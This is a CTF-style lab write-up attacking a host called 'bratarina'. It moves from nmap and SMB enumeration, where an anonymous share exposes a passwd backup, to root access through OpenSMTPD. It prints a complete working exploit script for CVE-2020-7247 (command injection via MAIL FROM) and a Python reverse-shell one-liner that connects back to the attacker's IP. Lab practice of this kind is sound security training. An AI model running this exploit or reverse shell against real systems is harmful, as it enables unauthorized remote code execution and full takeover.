Nmap

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 14:32 +08
Nmap scan report for 192.168.165.71
Host is up (0.039s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
|_  256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
25/tcp  open  smtp        OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.169], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
80/tcp  open  http        nginx 1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2024-11-25T06:32:25
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2024-11-25T01:32:24-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m59s, deviation: 2h53m14s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.03 seconds

Only a few ports open, i.e. 22, 25, 80 and 445.

SMB

Before jumping straight into the web app on port 80, I wanna do some basic enumeration on SMB first.

nullinux

nullinux 192.168.165.71

    Starting nullinux v5.5.0dev | 11-25-2024 14:48



[*] Enumerating Shares for: 192.168.165.71
        Shares                     Comments
   -------------------------------------------
    \\192.168.165.71\backups         Share for backups
    \\192.168.165.71\IPC$

   [*] Enumerating: \\192.168.165.71\backups
       .                                   D        0  Mon Jul  6 15:46:41 2020
       ..                                  D        0  Mon Jul  6 15:46:41 2020
       passwd.bak                          N     1747  Mon Jul  6 15:46:41 2020
...<truncated>...

I am able to perform anonymous login on the backups share where I find a passwd.bak.

smbclient \\\\192.168.165.71\\backups
Password for [WORKGROUP\hans]:
Anonymous login successful
Try "help" to get a list of possible commands.

smb: \> dir
  .                                   D        0  Mon Jul  6 15:46:41 2020
  ..                                  D        0  Mon Jul  6 15:46:41 2020
  passwd.bak                          N     1747  Mon Jul  6 15:46:41 2020

                10253588 blocks of size 1024. 6355108 blocks available

smb: \> get passwd.bak
getting file \passwd.bak of size 1747 as passwd.bak (11.0 KiloBytes/sec) (average 11.0 KiloBytes/sec)

smb: \> exit

passwd.bak

cat passwd.bak
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network❌100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve❌101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog❌102:106::/home/syslog:/usr/sbin/nologin
messagebus❌103:107::/nonexistent:/usr/sbin/nologin
_apt❌104:65534::/nonexistent:/usr/sbin/nologin
lxd❌105:65534::/var/lib/lxd/:/bin/false
uuidd❌106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq❌107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape❌108:112::/var/lib/landscape:/usr/sbin/nologin
sshd❌109:65534::/run/sshd:/usr/sbin/nologin
pollinate❌110:1::/var/cache/pollinate:/bin/false
neil❌1000:1000:neil,,,:/home/neil:/bin/bash
_smtpd❌1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
_smtpq❌1002:1002:SMTPD Queue:/var/empty:/sbin/nologin
postgres❌111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

passwd.bak seems to be a backup of the /etc/passwd file where we find a possible user neil.

cat passwd.bak | grep "sh$"
root❌0:0:root:/root:/bin/bash
neil❌1000:1000:neil,,,:/home/neil:/bin/bash
postgres❌111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

SMTP

25/tcp  open  smtp        OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.169], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info

Looking at the Nmap results of port 25, we see something interesting. It appears that we are able to connect and interact with it.

Additionally, it appears that the OpenSMTPD version is 2.0.0 so let’s see if there are any exploits.

Exploit

I found this RCE exploit which should work for versions before 6.6.2. https://www.exploit-db.com/exploits/47984

# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))

res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
    print('[!] No OpenSMTPD detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')

Root Shell

For some reason, I tried to run basic commands like wget and curl to “phone home”, however, I cannot seem to get any response from my Python HTTP server.

Python Reverse Shell

I decided to just plug in a python reverse shell and it actually worked.

python -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.45.169\", 445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"

I modified the Python Reverse Shell code generated from revshells.com by escaping the double quotes since I will be inputting it as an argument of the Python exploit.

python3 opensmtp.py 192.168.165.71 25 'python -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.45.169\", 445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Upon running the exploit, my nc listener catches the shell. I used port 445 as i wanted to use a port that is also open on the box to prevent any firewall issues.

sudo wrapnc 445
[sudo] password for hans:
listening on [any] 445 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.165.71] 44046
root@bratarina:~# cat proof.txt
29d6bdfb308c71dc8203e8bb7e6c7b5f

I immediately get a root shell and the proof flag.

Nmap#

SMB#

nullinux#

backups Share#

passwd.bak#

SMTP#

Exploit#

Root Shell#

Python Reverse Shell#